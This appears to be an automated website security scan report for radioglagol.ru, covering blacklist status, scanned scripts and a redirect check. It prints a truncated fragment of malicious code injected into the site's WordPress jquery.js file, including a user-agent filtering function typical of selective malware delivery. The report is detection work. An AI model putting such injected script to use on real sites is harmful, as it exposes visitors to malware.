Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=radioglagol.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://radioglagol.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.radioglagol.ru/ | 200 OK Content-Length: 33036 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js | 200 OK Content-Length: 92556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.23/jquery-ui.min.js | 200 OK Content-Length: 200748 Content-Type: text/javascript | clean |
http://www.radioglagol.ru/rh_player/js/jquery.jplayer.min.js | 200 OK Content-Length: 47763 Content-Type: application/x-javascript | clean |
http://www.radioglagol.ru/rh_player/js/player.js | 200 OK Content-Length: 9907 Content-Type: application/x-javascript | clean |
http://vk.com/js/api/openapi.js | 200 OK Content-Length: 64039 Content-Type: application/x-javascript | clean |
http://www.radioglagol.ru/uppod.js | 404 Not Found Content-Length: 21221 Content-Type: text/html | clean |
http://www.radioglagol.ru/swfobject.js | 200 OK Content-Length: 4811 Content-Type: application/x-javascript | clean |
http://radioheart.ru/tools/modal/messi.js | 200 OK Content-Length: 9319 Content-Type: application/x-javascript | clean |
http://www.radioglagol.ru/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 101213 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' jQuery.noConflict(); Antivirus reports:
| ||
http://www.radioglagol.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 12011 Content-Type: application/x-javascript | clean |
http://consultsystems.ru/script/17635/ | 200 OK Content-Length: 74855 Content-Type: application/x-javascript | clean |
http://www.radioglagol.ru/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05 | 200 OK Content-Length: 21116 Content-Type: application/x-javascript | clean |
http://www.radioglagol.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8 | 200 OK Content-Length: 14441 Content-Type: application/x-javascript | clean |
http://www.radioglagol.ru/wp-content/themes/duena/js/navigation.js?ver=20120206 | 200 OK Content-Length: 5914 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: radioglagol.ru
Result:
GET / HTTP/1.1
Host: radioglagol.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: radioglagol.ru
Referer: http://www.google.com/search?q=radioglagol.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: radioglagol.ru
Referer: http://www.google.com/search?q=radioglagol.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.